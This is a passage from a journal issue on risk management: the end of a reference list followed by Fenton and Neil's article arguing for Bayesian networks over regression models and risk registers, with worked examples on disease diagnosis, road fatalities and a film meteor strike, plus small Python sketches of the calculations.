„ M. Kajko-Mattsson, J. Nyfjord. State of Software
Risk Management Practice, IAENG International Journal
of Computer Science, 35(4), 451-462, 2008.
„ M. Keil, L. Wallace, D. Turk, G. Dixon-Randall, U.
Nulden. An Investigation of Risk Perception and Risk Propensity on the Decision to Continue a Software Development Project, The Journal of Systems and Software,
53(2), 145-157, 2000.
„ T.A. Longstaff, C. Chittister, R. Pethia, Y.Y. Haimes. Are We Forgetting the Risks of Information Technology? IEEE Computer, 33(12), 43-51, 2000.
„ S. Pender. Managing Incomplete Knowledge: Why
Risk Management is not Sufficient, 19(1), 79-87, 2001.
„ O. Perminova, M. Gustaffson, K. Wikstrom. Defining Uncertainty in Projects: A New Perspective, International Journal of Project Management, 26(1), 73-79, 2008.
„ S. Pfleeger. Risky Business: What we have Yet to
Learn About Risk Management, Journal of Systems and
Software, 53(3), 265-273, 2000.
„ J. Ropponen, K. Lyytinen. Components of Software
Development Risk: How to Address Them? A Project Manager Survey, IEEE Transactions on Software Engineering,
26(2), 98-112, 2000.
„ L. Sarigiannidis, P. Chatzoglou. Software Development Project Risk Management: A New Conceptual Framework, Journal of Software Engineering and Applications (JSEA), 4(5), 293-305, 2011.
„ R. Schmidt, K. Lyytinen, M. Keil, P. Cule. Identifying Software Project Risks: An International Delphi Study, Journal of Management Information Systems, 17(4), 5-36, 2001.
„ L. Wallace, M. Keil. Software Project Risks and their
Effects on Project Outcomes, Communications of the
ACM, 47(4), 68-73, 2004.
„ L. Wallace, M. Keil, A. Rai. Understanding Software Project Risk: A Cluster Analysis, Journal of Information and Management, 42 (1), 115-125, 2004.
Web Sites
„ <http://www.best-management-practice.com/RiskManagement-MoR/>.
„ <http://www.computerweekly.com/feature/RiskManagement-Software-Essential-Guide>
„ <http://www.riskworld.com/>
„ <http://www.riskworld.com/websites/webfiles/ws5aa015.htm>
„ Directory of risk management websites: <http://www.riskworld.com/websites/webfiles/ws00aa009.htm>
„ Risk management journals: <http://www.riskworld.com/software/sw5sw001.htm>
The Use of Bayes and Causal Modelling in Decision Making,
Uncertainty and Risk
Norman Fenton and Martin Neil
The most sophisticated commonly used methods of risk assessment (used especially in the financial sector) involve building statistical models from historical data. Yet such approaches are inadequate when risks are rare or novel because there
is insufficient relevant data. Less sophisticated commonly used methods of risk assessment, such as risk registers, make
better use of expert judgement but fail to provide adequate quantification of risk. Neither the data-driven nor the risk
register approaches are able to model dependencies between different risk factors. Causal probabilistic models (called
Bayesian networks) that are based on Bayesian inference provide a potential solution to all of these problems. Such
models can capture the complex interdependencies between risk factors and can effectively combine data with expert
judgement. The resulting models provide rigorous risk quantification as well as genuine decision support for risk management.
Keywords: Bayes, Bayesian Networks, Causal Models, Risk.
1 Introduction
The 2008-10 credit crisis brought misery to millions
around the world, but it at least raised awareness of the need
for improved methods of risk assessment. The armies of
analysts and statisticians employed by banks and government agencies had failed to predict either the event or its
scale until far too late. Yet the methods that could have
worked – and which are the subject of this paper – were
largely ignored. Moreover, the same methods have the potential to transform risk analysis and decision making in all
walks of life. For example:
„ Medical: Imagine you are responsible for diagnosing a condition and for prescribing one of a number of possible treatments. You have some background information
about the patient (some of which is objective like age and
number of previous operations, but some is subjective, like
‘overweight’ and ‘prone to stress’); you also have some prior
information about the prevalence of different possible conditions (for example, bronchitis may be ten times more likely
than cancer). You run some diagnostic tests about which
you have some information about the accuracy (such as the
chances of false negative and false positive outcomes). You
also have various bits of information about the success rates
of the different possible treatments and their side effects.
On the basis of all this information how do you arrive at a
decision of which treatment pathway to take? And how
would you justify that decision if something went wrong?
Authors

Norman Fenton is a Professor in Risk Information Management at Queen Mary University of London, United Kingdom, and also CEO of Agena, a company that specialises in risk management for critical systems. His current work on quantitative risk assessment focuses on using Bayesian networks. Norman’s experience in risk assessment covers a wide range of application domains such as software project risk, legal reasoning (he has been an expert witness in major criminal and civil cases), medical decision-making, vehicle reliability, embedded software, transport systems, and financial services. Norman has published over 130 articles and 5 books on these subjects, and his company Agena has been building Bayesian Net-based decision support systems for a range of major clients in support of these applications. <[email protected]>

Martin Neil is Professor in Computer Science and Statistics at the School of Electronic Engineering and Computer Science, Queen Mary, University of London, United Kingdom. He is also a joint founder and Chief Technology Officer of Agena Ltd and is Visiting Professor in the Faculty of Engineering and Physical Sciences, University of Surrey, United Kingdom. Martin has over twenty years’ experience in academic research, teaching, consulting, systems development and project management and has published or presented over 70 papers in refereed journals and at major conferences. His interests cover Bayesian modelling and/or risk quantification in diverse areas: operational risk in finance, systems and design reliability (including software), software project risk, decision support, simulation, AI and statistical learning. He earned a BSc in Mathematics, a PhD in Statistics and Software Metrics and is a Chartered Engineer. <[email protected]>

Figure 1: Causal View of Evidence.

„ Legal: Anybody involved in a legal case (before or during a trial) will see many pieces of evidence. Some of
the evidence favours the prosecution hypothesis of guilty
and some of the evidence favours the defence hypothesis of
innocence. Some of the evidence is statistical (such as the
match probability of a DNA sample) and some is purely
subjective, such as a character witness statement. It is your
duty to combine the value of all of this evidence either to
determine if the case should proceed to trial or to arrive at a
probability (‘beyond reasonable doubt’) of innocence. How
would you arrive at a decision?
„ Safety: A transport service (such as a rail network or
an air traffic control centre) is continually striving to improve safety, but must nevertheless ensure that any proposed
improvements are cost effective and do not degrade efficiency. There are a range of alternative competing proposals for safety improvement, which depend on many different aspects of the current infrastructure (for example, in the
case of an air traffic control centre alternatives may include
new radar, new collision avoidance detection devices, or
improved air traffic management staff training). How do you
determine the ‘best’ alternative taking into account not just
cost but also impact on safety and efficiency of the overall
system? How would you justify any such decision to a team
of government auditors?
„ Financial: A bank needs sufficient liquid capital readily available in the event of exceptionally poor performance,
either from credit or market risk events, or from catastrophic
operational failures of the type that brought down Barings
in 1995 and almost brought down Société Générale in 2007.
It therefore has to calculate and justify a capital allocation
that properly reflects its ‘value at risk’. Ideally this calculation needs to take account of a multitude of current financial indicators, but given the scarcity of previous catastrophic
failures, it is also necessary to consider a range of subjective factors such as the quality of controls in place within
the bank. How can all of this information be combined to
determine the real value at risk in a way that is acceptable to
the regulatory authorities and shareholders?
„ Reliability: The success or failure of major new
products and systems often depends on their reliability, as
experienced by end users. Whether it is a high end digital
TV, a software operating system, or a complex military vehicle, like an armoured vehicle, too many faults in the delivered product can lead to financial disaster for the producing company or even a failed military mission including loss of life. Hence, pre-release testing of such systems
is critical. But no system is ever perfect and a perfect system delivered after a competitor gets to the market first may
be worthless. So how do you determine when a system is
‘good enough’ for release, or how much more testing is
needed? You may have hard data in the form of a sequence
of test results, but this has to be considered along with subjective data about the quality of testing and the realism of
the test environment.
What is common about all of the above problems is that
a ‘gut-feel’ decision based on doing all the reasoning ‘in
your head’ or on the back of an envelope is fundamentally
inadequate and increasingly unacceptable. Nor can we base
our decision on purely statistical data of ‘previous’ instances,
since in each case the ‘risk’ we are trying to calculate is
essentially unique in many aspects. To deal with these kinds
of problems consistently and effectively we need a rigorous method of quantifying uncertainty that enables us to
combine data with expert judgement. Bayesian probability, which we introduce in Section 2, is such an approach.
We also explain how Bayesian probability combined with
causal models (Bayesian networks) enables us to factor in
causal relationships and dependencies. In Section 3 we
review standard statistical and other approaches to risk assessment, and argue that a proper causal approach based
on Bayesian networks is needed in critical cases.
2 Bayes Theorem and Bayesian Networks
At their heart, all of the problems identified in Section
1 incorporate the basic causal structure shown in Figure 1.
There is some unknown hypothesis H about which we
wish to assess the uncertainty and make some decision. Does
the patient have the particular disease? Is the defendant
guilty of the crime? Will the system fail within a given period of time? Is a capital allocation of 5% going to be sufficient to cover operational losses in the next financial year?
Consciously or unconsciously we start with some (unconditional) prior belief about H (for example, ‘there is a 1
in 1000 chance this person has the disease’). Then we
update our prior belief about H once we observe evidence
E (for example, depending on the outcome of a test our
belief about H being true might increase or decrease). This
updating takes account of the likelihood of the evidence,
which is the chance of seeing the evidence E if H is true.
When done formally this type of reasoning is called
Bayesian inference, named after Thomas Bayes who determined the necessary calculations for it in 1763. Formally,
we start with a prior probability P(H) for the hypothesis H.
The likelihood, for which we also have prior knowledge, is
formally the conditional probability of E given H, which
we write as P(E|H).
Bayes’s theorem provides the correct formula for updating our prior belief about H in the light of observing E.
In other words Bayes calculates P(H|E) in terms of P(H)
and P(E|H). Specifically:
P(H | E) = P(E | H) P(H) / P(E) = P(E | H) P(H) / [P(E | H) P(H) + P(E | not H) P(not H)]
Example 1: Assume one in a thousand people has a particular disease H. Then:
P(H) = 0.001, so P(not H) = 0.999
Also assume a test to detect the disease has 100% sensitivity (i.e. no false negatives) and 95% specificity (meaning 5% false positives). Then if E represents the Boolean
variable "Test positive for the disease", we have:
P(E | not H) = 0.05
P(E | H) = 1
Now suppose a randomly selected person tests positive.
What is the probability that the person actually has the disease? By Bayes Theorem this is:

P(H | E) = P(E | H) P(H) / [P(E | H) P(H) + P(E | not H) P(not H)]
         = (1 × 0.001) / (1 × 0.001 + 0.05 × 0.999)
         = 0.01963

So there is a less than 2% chance that a person testing positive actually has the disease.
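The calculation in Example 1 is easy to verify numerically; the short Python sketch below simply reproduces it (the function name and figures mirror the example and are not from the paper).

def posterior(prior, sensitivity, false_positive_rate):
    """P(H | E) for a single binary test, via Bayes' theorem."""
    p_evidence = sensitivity * prior + false_positive_rate * (1.0 - prior)
    return sensitivity * prior / p_evidence

# Figures from Example 1: 1-in-1000 prevalence, no false negatives, 5% false positives.
print(round(posterior(0.001, 1.0, 0.05), 5))   # prints 0.01963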
Bayes theorem has been used for many years in numerous applications ranging from insurance premium calculations [1], through to web-based personalisation (such as with
Google and Amazon). Many of the applications pre-date
modern computers (see, e.g. [2] for an account of the crucial role of Bayes theorem in code breaking during World
War 2).
However, while Bayes theorem is the only rational way
of revising beliefs in the light of observing new evidence, it
is not easily understood by people without a statistical/mathematical background. Moreover, the results of Bayesian
calculations can appear, at first sight, as counter-intuitive.
12
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Figure 2: Bayesian Network for Diagnosing Disease.
Farewell Edition
© Novática
Risk Management
Probability Table for “Visit to Asia?”
Probability Table for “Bronchitis?”
Figure 3: Node Probability Table (NPT) Examples.
factors that influence certain diseases more than others (such
as smoking, visit to Asia).
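Readers who want to check the arithmetic of Example 1 can do so in a few lines. The sketch below is ours (not taken from any of the article's tools) and simply applies the formula above with the numbers assumed in Example 1.

# Bayes theorem for Example 1: one hypothesis (disease) and one piece of evidence (positive test)
p_h = 0.001             # prior: 1 in 1,000 people has the disease
p_e_given_h = 1.0       # sensitivity: no false negatives
p_e_given_not_h = 0.05  # 1 - specificity: 5% false positives

# total probability of a positive test
p_e = p_e_given_h * p_h + p_e_given_not_h * (1 - p_h)

# posterior probability of disease given a positive test
p_h_given_e = p_e_given_h * p_h / p_e
print(f"P(disease | positive test) = {p_h_given_e:.4f}")  # ~0.0196, i.e. less than 2%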
To use Bayesian inference properly in this type of network necessarily involves multiple applications of Bayes
Theorem in which evidence is ‘propagated’ throughout. This
process is complex and quickly becomes infeasible when
there are many nodes and/or nodes with multiple states. This
complexity is the reason why, despite its known benefits,
there was for many years little appetite to use Bayesian inference to solve real-world decision and risk problems. Fortunately, due to breakthroughs in the late 1980s that produced efficient calculation algorithms [2][6], there are now widely available tools such as [7] that enable anybody to do the Bayesian calculations without ever having to understand, or even look at, a mathematical formula. These developments were the catalyst for an explosion of interest in BNs. Using such a tool we can do the kind of powerful reasoning shown in Figure 4.

Figure 4: Reasoning within the Bayesian Network. (a) Prior beliefs point to bronchitis as most likely; (b) patient is a ‘non-smoker’ experiencing dyspnoea (shortness of breath), which strengthens belief in bronchitis; (c) a positive X-ray result increases the probability of TB and cancer, but bronchitis is still most likely; (d) a visit to Asia makes TB most likely.

Specifically:
„ With the prior assumptions alone (Figure 4a) Bayes
theorem computes what are called the prior marginal probabilities for the different disease nodes (note that we did not
‘specify’ these probabilities – they are computed automatically; what we specified were the conditional probabilities
of these diseases given the various states of their parent
nodes). So, before any evidence is entered the most likely
disease is bronchitis (45%).
„ When we enter evidence about a particular patient
the probabilities for all of the unknown variables get updated by the Bayesian inference. So, (in Figure 4b) once we
enter the evidence that the patient has dyspnoea and is a
non-smoker, our belief in bronchitis being the most likely
disease increases (75%).
„ If a subsequent X-ray test is positive (Figure 4c) our beliefs in both TB (26%) and cancer (25%) are raised, but bronchitis is still the most likely (57%).
„ However, if we now discover that the patient visited
Asia (Figure 4d) we overturn our belief in bronchitis in favour of TB (63%).
Note that we can enter any number of observations anywhere in the BN and update the marginal probabilities of all
the unobserved variables. As the above example demonstrates, this can yield some exceptionally powerful analyses
that are simply not possible using other types of reasoning
and classical statistical analysis methods.
In particular, BNs offer the following benefits:
„ Explicitly model causal factors
„ Reason from effect to cause and vice versa
„ Overturn previous beliefs in the light of new evidence
(also called ‘explaining away’)
„ Make predictions with incomplete data
„ Combine diverse types of evidence including both
subjective beliefs and objective data.
„ Arrive at decisions based on visible, auditable reasoning (unlike black-box modelling techniques, there are no "hidden" variables and the inference mechanism is based on a long-established theorem).
With the advent of the BN algorithms and associated
tools, it is therefore no surprise that BNs have been used in
a range of applications that were not previously possible
with Bayes Theorem alone. A comprehensive (and easily
accessible) overview of BN applications, with special emphasis on their use in risk assessment, can be found in [8].
It is important to recognise that the core intellectual overhead in using the BN approach is in defining the model
structure and the NPTs – the actual Bayesian calculations
can and must always be carried out using a tool. However,
while these tools enable large-scale BNs to be executed efficiently, most provide little or no support for users to actually build large-scale BNs, nor to interact with them easily.
Beyond a graphical interface for building the structure, BN builders are left to struggle with the following kinds of practical problems that combine to create a barrier to the more
widespread use of BNs:
„ Eliciting and completing the probabilities in very large
NPTs manually (e.g. for a node with 5 states having three parents each with 5 states, the NPT requires 625 entries);
„ Dealing with very large graphs that contain similar, but slightly different, "patterns" of structure;
„ Handling continuous, as well as discrete variables.
Fortunately, recent algorithm and tool developments (also
described in [8]) have gone a long way to addressing these
problems and may lead to a ‘second wave’ of widespread BN
applications. But before BNs are used more widely in critical
risk assessment and decision making, there needs to be a fundamental cultural shift away from the current standard approaches to risk assessment, which we address next.
3 From Statistical Models and Risk Registers to Causal Models

3.1 Prediction based on Correlation is not Risk Assessment
Standard statistical approaches to risk assessment seek to establish hypotheses from relationships discovered in data. Suppose we are interested, for example, in the risk of fatal automobile crashes. Table 1 gives the number of crashes resulting in fatalities in the USA in 2008, broken down by month (source: US National Highway Traffic Safety Administration). It also gives the average monthly temperature.

Table 1: Fatal Automobile Crashes per Month.

Month        Total fatal crashes   Average monthly temperature (F)
January      297                   17.0
February     280                   18.0
March        267                   29.0
April        350                   43.0
May          328                   55.0
June         386                   65.0
July         419                   70.0
August       410                   68.0
September    331                   59.0
October      356                   48.0
November     326                   37.0
December     311                   22.0

We plot the fatalities and temperature data in a scatterplot graph, as shown in Figure 5.

Figure 5: Scatterplot of Temperature against Road Fatalities (each Dot represents a Month).
There seems to be a clear relationship between temperature and fatalities – fatalities increase as the temperature
increases. Indeed, using the standard statistical tools of correlation and p-values, statisticians would accept the hypothesis of a relationship as ‘highly significant’ (the correlation
coefficient here is approximately 0.869 and it comfortably
passes the criteria for a p-value of 0.01).
However, in addition to serious concerns about the use
of p-values generally (as described comprehensively in [6]),
there is an inevitable temptation arising from such results
to infer causal links such as, in this case, higher temperatures cause more fatalities. Even though any introductory statistics course teaches that correlation is not causation, the regression equation is typically used for prediction (e.g. in this
case the equation relating N to T is used to predict that at 80F
we might expect to see 415 fatal crashes per month).
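For readers who want to reproduce these figures, here is a minimal sketch using the data of Table 1; assuming numpy is available, it recovers a correlation of roughly 0.87 and a prediction of roughly 415 crashes per month at 80F, in line with the values quoted above.

import numpy as np

# Data from Table 1: 2008 US fatal crashes and average monthly temperature (F)
crashes = np.array([297, 280, 267, 350, 328, 386, 419, 410, 331, 356, 326, 311])
temps   = np.array([17.0, 18.0, 29.0, 43.0, 55.0, 65.0, 70.0, 68.0, 59.0, 48.0, 37.0, 22.0])

# Correlation between temperature and fatal crashes
r = np.corrcoef(temps, crashes)[0, 1]
print(f"correlation = {r:.3f}")          # ~0.87

# Least-squares regression N = a + b*T, then the prediction at 80F
b, a = np.polyfit(temps, crashes, 1)
print(f"N = {a:.1f} + {b:.2f}*T")
print(f"predicted crashes at 80F = {a + b * 80:.0f}")   # ~415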
But there is a grave danger of confusing prediction with
risk assessment. For risk assessment and management the
regression model is useless, because it provides no explanatory power at all. In fact, from a risk perspective this model
would provide irrational, and potentially dangerous, information: it would suggest that if you want to minimise your
chances of dying in an automobile crash you should do your
driving when the highways are at their most dangerous, in
winter.
One obvious improvement to the model, if the data is
available, is to factor in the number of miles travelled (i.e.
journeys made). But there are other underlying causal and
influential factors that might do much to explain the apparently strange statistical observations and provide better
insights into risk. With some common sense and careful
reflection we can recognise the following:
„ Temperature influences the highway conditions
(which will be worse as temperature decreases).
„ Temperature also influences the number of journeys
made; people generally make more journeys in spring and
summer and will generally drive less when weather conditions are bad.
„ When the highway conditions are bad people tend
to reduce their speed and drive more slowly. So highway
conditions influence speed.
„ The actual number of crashes is influenced not just by
the number of journeys, but also the speed. If relatively few
people are driving, and taking more care, we might expect fewer
fatal crashes than we would otherwise experience.
The influence of these factors is shown in Figure 6.

Figure 6: Causal Model for Fatal Crashes.
The crucial message here is that the model no longer
involves a simple single causal explanation; instead it combines the statistical information available in a database (the
‘objective’ factors) with other causal ‘subjective’ factors derived from careful reflection. These factors now interact in
a non-linear way that helps us to arrive at an explanation
for the observed results. Behaviour, such as our natural cau-
tion to drive slower when faced with poor road conditions,
leads to lower accident rates (people are known to adapt to
the perception of risk by tuning it to tolerable levels – this is formally referred to as risk homeostasis). Conversely, if we insist on driving fast in poor road conditions then, irrespective of the temperature, the risk of an accident increases. The model is thus able to capture our intuitive beliefs that were contradicted by the counterintuitive results from the simple regression model.
The role played in the causal model by driving speed
reflects human behaviour. The fact that the data on the average speed of automobile drivers was not available in a
database explains why this variable, despite its apparent
obviousness, did not appear in the statistical regression
model. The situation whereby a statistical model is based
only on available data, rather than on reality, is called "conditioning on the data". This enhances convenience but at
the cost of accuracy.
By accepting the statistical model we are asked to defy
our senses and experience and actively ignore the role unobserved factors play. In fact, we cannot even explain the
results without recourse to factors that do not appear in the
database. This is a key point: with causal models we seek
to dig deeper behind and underneath the data to explore
richer relationships missing from over-simplistic statistical
models. In doing so we gain insights into how best to control risk and uncertainty. The regression model, based on
the idea that we can predict automobile crash fatalities based
on temperature, fails to answer the substantive question: how can we control or influence behaviour to reduce fatalities? This at least is achievable; control of the weather is not.
3.2 Risk Registers do not help quantify Risk
While statistical models based on historical data represent one end of a spectrum of sophistication for risk assessment, at the other end is the commonly used idea of a ‘risk
register’. In this approach, there is no need for past data; in
considering the risks of a new project risk managers typically prepare a list of ‘risks’ that could be things like:
„ Some key people you were depending on become
unavailable
„ A piece of technology you were depending on fails.
„ You run out of funds or time
The very act of listing and then prioritising risks means that, mentally at least, risk managers are making a decision about which risks are the biggest. Most standard texts on
risk propose decomposing each risk into two components:
„ ‘Probability’ (or likelihood) of the risk
„ ‘Impact’ (or loss) the risk can cause

Figure 7: Standard Impact-based Risk Measure.
An Example: Meteor Strike Alarm in the Film "Armageddon"
By destroying the meteor in the film "Armageddon" Bruce Willis saved the world. Both the chance of the meteor strike
and the consequences of such a strike were so high, that nothing much else mattered except to try to prevent the strike.
In popular terminology what the world was confronting was a truly massive ‘risk’. But if the NASA scientists in the film
had measured the size of the risk using the formula in Figure 7 they would have discovered such a measure was
irrational, and it certainly would not have explained to Bruce Willis and his crew why their mission made sense. Specifically:
„ Cannot get the Probability number (for meteor strikes earth). According to the NASA scientists in the film the
meteor was on a direct collision course with earth. Does that make it a certainty (i.e. a 100% chance) of it striking Earth?
Clearly not, because if it was then there would have been no point in sending Bruce Willis and his crew up in the space
shuttle. The probability of the meteor striking Earth is conditional on a number of control events (like intervening to
destroy the meteor) and trigger events (like being on a collision course with Earth). It makes no sense to assign a direct
probability without considering the events it is conditional on. In general it makes no sense (and would in any case be
too difficult) for a risk manager to give the unconditional probability of every ‘risk’ irrespective of relevant
controls and triggers. This is especially significant when there are, for example, controls that have never been used
before (like destroying the meteor with a nuclear explosion).
„ Cannot get the Impact number (for meteor striking earth). Just as it makes little sense to attempt to assign an
(unconditional) probability to the event "Meteor strikes Earth’, so it makes little sense to assign an (unconditional)
number to the impact of the meteor striking. Apart from the obvious question "impact on what?", we cannot say what the
impact is without considering the possible mitigating events such as getting people underground and as far away as
possible from the impact zone.
„ Risk score is meaningless. Even if we could get round the two problems above what exactly does the resulting
number mean? Suppose the (conditional) probability of the strike is 0.95 and, on a scale of 1 to 10, the impact of the
strike is 10 (even accounting for mitigants). The meteor ‘risk’ is 9.5, which is a number close to the highest possible 10.
But it does not measure anything in a meaningful sense.
„ It does not tell us what we really need to know. What we really need to know is the probability, given our current
state of knowledge, that there will be massive loss of life.
The most common way to measure each risk is to multiply the probability of the risk (however you happen to measure that) by the impact of the risk (however you happen to measure that), as in Figure 7.
The resulting number is the ‘size’ of the risk - it is based
on analogous ‘utility’ measures. This type of risk measure
is quite useful for prioritising risks (the bigger the number
the ‘greater’ the risk) but it is normally impractical and can
be irrational when applied blindly. We are not claiming that
this formulation is wrong. Rather, we argue that it is normally not sufficient for decision-making.
One immediate problem with the risk measure of Figure
7 is that, normally, you cannot directly get the numbers you
need to calculate the risk without recourse to a much more
detailed analysis of the variables involved in the situation at
hand.
In addition to the problem of measuring the size of each
individual risk in isolation, risk registers suffer from the
following problems:
„ However the individual risk size is calculated, the
cumulative risk score measures the total project risk. Hence,
there is a paradox involved in such an approach: the more
carefully you think about risk (and hence the more individual risks you record in the risk register) the higher the
overall risk score becomes. Since higher risk scores are assumed to indicate greater risk of failure it seems to follow
that your best chance of a new project succeeding is to simply ignore, or under-report, any risks.
„ Different projects or business divisions will assess
risk differently and tend to take a localised view of their
own risks and ignore that of others. This "externalisation"
of risk to others is especially easy to ignore if their interests
are not represented when constructing the register. For example the IT department may be forced to accept the deadlines imposed by the marketing department.
„ A risk register does not record "opportunities" or "serendipity" and so does not deal with upside uncertainty, only
downside.
„ Risks are not independent. For example, in most circumstances cost, time and quality will be inextricably linked;
you might be able to deliver faster but only by sacrificing
quality. Yet "poor quality" and "missed delivery" will appear as separate risks on the register giving the illusion that
we can control or mitigate one independently of the other.
In the subprime loan crisis of 2008 there were three risks:
1) extensive defaults on subprime loans, 2) growth in novelty and complexity of financial products and 3) failure of
AIG (American International Group Inc.) to provide insurance to banks when customers default. Individually these
risks were assessed as ‘small’. However, when they occurred
together the total risk was much larger than the individual
risks. In fact, it never made sense to consider the risks individually at all.
Hence, risk analysis needs to be coupled with an assessment of the impact of the underlying events, one on
another, and in terms of their effect on the ultimate outcomes being considered. The accuracy of the risk assessment
is crucially dependent on the fidelity of the underlying model;
the simple formulation of Figure 7 is insufficient. Instead of
going through the motions to assign numbers without actually
doing much thinking, we need to consider what lies under the
bonnet.
Risk is a function of how closely connected events, systems and actors in those systems might be. Proper risk assessment requires a holistic outlook that embraces a causal
view of interconnected events. Specifically, to get rational measures of risk you need a causal model, as we describe next. Once you do this, measuring risk starts to make sense, but it requires an investment in time and thought.
3.2.1 Thinking about Risk using Causal Analysis
It is possible to avoid all the above problems and ambiguities surrounding the term risk by considering the causal context in which risks happen (in fact everything we present here
applies equally to opportunities but we will try to keep it as
simple as possible). The key thing is that a risk is an event that
can be characterised by a causal chain involving (at least):
„ the event itself
„ at least one consequence event that characterises the
impact
„ one or more trigger (i.e. initiating) events
„ one or more control events which may stop the trigger event from causing the risk event
„ one or more mitigating events which help avoid the
consequence event
This is shown in the example of Figure 8.

Figure 8: Meteor Strike Risk.
With this causal perspective, a risk is therefore actually
characterised not by a single event, but by a set of events.
These events each have a number of possible outcomes (to
keep things as simple as possible in the example here we
will assume each has just two outcomes true and false so
we can assume "Loss of life" here means something like
‘loss of at least 80% of the world population’).
The ‘uncertainty’ associated with a risk is not a separate notion (as assumed in the classic approach). Every event
(and hence every object associated with risk) has uncertainty that is characterised by the event’s probability distribution. Triggers, controls, and mitigants are all inherently
uncertain. The sensible risk measures that we are proposing are simply the probabilities you get from running the
BN model. Of course, before you can run it you still have
to provide the prior probability values. But, in contrast to
the classic approach, the probability values you need to supply are relatively simple and they make sense. And you
never have to define vague numbers for ‘impact’.
Example. To give you a feel for what you would need to
do, in the Armageddon BN example of Figure 8 for the
uncertain event "Meteor strikes Earth" we still have to as-
sign some probabilities. But instead of second guessing what
this event actually means in terms of other conditional
events, the model now makes it explicit and it becomes much
easier to define the necessary conditional probability. What
we need to do is define the probability of the meteor strike
given each combination of parent states as shown in Figure
9.

Figure 9: Conditional Probability Table for "Meteor strikes Earth".
For example, if the meteor is on a collision course then the probability of it striking the Earth is 1 if it is not destroyed, and 0.2 if it is. In completing such a table we no
longer have to try to ‘factor in’ any implicit conditioning
events like the meteor trajectory.
There are some events in the BN for which we do need
to assign unconditional probability values. These are represented by the nodes in the BN that have no parents; it makes
sense to get unconditional probabilities for these because,
by definition, they are not conditioned on anything (this is
obviously a choice we make during our analysis). Such
nodes can generally be only triggers, controls or mitigants.
An example, based on dialogue from the film, is shown in
Figure 10.

Figure 10: Probability Table for "Meteor on Collision Course with Earth".
Once we have supplied the prior probability values, a BN tool will run the model and generate all the measures of risk that you need. For example, when you run the model using only the initial probabilities, the model (as shown in Figure 11) computes the probability of the meteor striking Earth as 99.1% and the probability of loss of life (meaning loss of at least 80% of the world population) as about 94%.

Figure 11: Initial Risk of Meteor Strike.
In terms of the difference that Bruce Willis and his crew
could make we run two scenarios: One where the meteor is
exploded and one where it is not. The results of both scenarios are shown together in Figure 12.

Figure 12: The Potential Difference made by Bruce Willis and Crew.
Reading off the values for the probability of "loss of
life" being false we find that we jump from just over 4%
(when the meteor is not exploded) to 81% (when the meteor is exploded). This massive increase in the chance of
saving the world clearly explains why it merited an attempt.
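To make the mechanics concrete, below is a minimal brute-force sketch of a toy version of this network. Only the two strike probabilities stated above (1 if the meteor is not destroyed, 0.2 if it is, given a collision course) come from the text; the prior on the collision course, the loss-of-life probabilities and the variable names are placeholder assumptions of ours, so the outputs illustrate the shape of the analysis rather than reproducing the 99.1%, 94%, 4% and 81% figures shown in Figures 11 and 12.

from itertools import product

# Toy version of the Armageddon BN of Figure 8, computed by brute-force enumeration.
# Only the two strike probabilities (1.0 and 0.2) come from the text; every other
# number below is a placeholder assumption.
p_collision = 0.99                      # trigger: meteor on collision course (assumed)
p_strike = {                            # CPT for "Meteor strikes Earth" (cf. Figure 9)
    # (on collision course, meteor destroyed): P(strike)
    (True, True): 0.2,                  # from the text
    (True, False): 1.0,                 # from the text
    (False, True): 0.0,                 # assumed
    (False, False): 0.0,                # assumed
}
p_loss_given_strike = {True: 0.95, False: 0.01}   # consequence probabilities (assumed)

def p_loss_of_life(destroyed: bool) -> float:
    """P(loss of life) for a given scenario of the control event 'destroy meteor'."""
    total = 0.0
    for collision, strike, loss in product([True, False], repeat=3):
        p = p_collision if collision else 1 - p_collision
        ps = p_strike[(collision, destroyed)]
        p *= ps if strike else 1 - ps
        pl = p_loss_given_strike[strike]
        p *= pl if loss else 1 - pl
        if loss:
            total += p
    return total

for destroyed in (False, True):
    print(f"destroyed={destroyed}: P(loss of life) = {p_loss_of_life(destroyed):.3f}")

Even with made-up numbers, running the two scenarios shows the same qualitative pattern as the article: the probability of avoiding massive loss of life jumps dramatically once the control event succeeds.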
Clearly risks in this sense depend on stakeholders and
perspectives, but these perspectives can be easily combined
as shown in Figure 13 for ‘flood risk’ in some town.

Figure 13: Incorporating Different Risk Perspectives.
The types of events are all completely interchangeable
depending on the perspective. From the perspective of the
local authority the risk event is ‘Flood’ whose trigger is ‘dam
bursts upstream’ and which has ‘flood barrier’ as a control.
Its consequences include ‘loss of life’ and also ‘house
floods’. But the latter is a trigger for flood risk from a Householder perspective. From the perspective of the Local Authority Solicitor the main risk event is ‘Loss of life’ for
which ‘Flood’ is the trigger and ‘Rapid emergency response’
becomes a control rather than a mitigant.
This ability to decompose a risk problem into chains of
interrelated events and variables should make risk analysis
more meaningful, practical and coherent. The BN tells a
story that makes sense. This is in stark contrast with the
"risk equals probability times impact" approach where not
one of the concepts has a clear unambiguous interpretation.
Uncertainty is quantified and at any stage we can simply
read off the current probability values associated with any
event.
The causal approach can accommodate decision-mak-
ing as well as measures of utility. It provides a visual and
formal mechanism for recording and testing subjective probabilities. This is especially important for a risky event for
which you do not have much or any relevant data.
4 Conclusions
We have addressed some of the core limitations of both
a) the data-driven statistical approaches and b) risk registers, for effective risk management and assessment. We have
demonstrated how these limitations are addressed by using
BNs. The BN approach helps to identify, understand and
quantify the complex interrelationships (underlying even
seemingly simple situations) and can help us make sense of
how risks emerge, are connected and how we might represent our control and mitigation of them. By thinking about
the hypothetical causal relations between events we can investigate alternative explanations, weigh up the consequences of our actions and identify unintended or
(un)desirable side effects.
Of course it takes effort to produce a sensible BN model:
„ Special care has to be taken to identify cause and
effect: in general, a significant correlation between two factors A and B (where, for example A is ‘yellow teeth’ and B
is ‘cancer’) could be due to pure coincidence or a causal
mechanism, such that:
- A causes B
- B causes A
- Both A and B are caused by C (where in our example
C might be ‘smoking’) or some other set of factors
The difference between these possible mechanisms is
crucial in interpreting the data, assessing the risks to the
individual and society, and setting policy based on the analysis of these risks. In practice causal interpretation may collide with our personal view of the world and the prevailing
ideology of the organisation and social group, of which we
will be a part. Explanations consistent with the ideological
viewpoint of the group may be deemed more worthy and
valid than others irrespective of the evidence. Hence simplistic causal explanations (e.g. ‘poverty’ causes ‘violence’)
are sometimes favoured by the media and reported unchallenged. This is especially so when the explanation fits the
established ideology helping to reinforce ingrained beliefs.
Picking apart over-simplistic causal claims and reconstructing them into a richer, more realistic causal model helps
separate ideology from reality and determine whether the
model explains reality. The richer model may then also help
identify more realistic possible policy interventions.
„ The states of variables need to be carefully defined
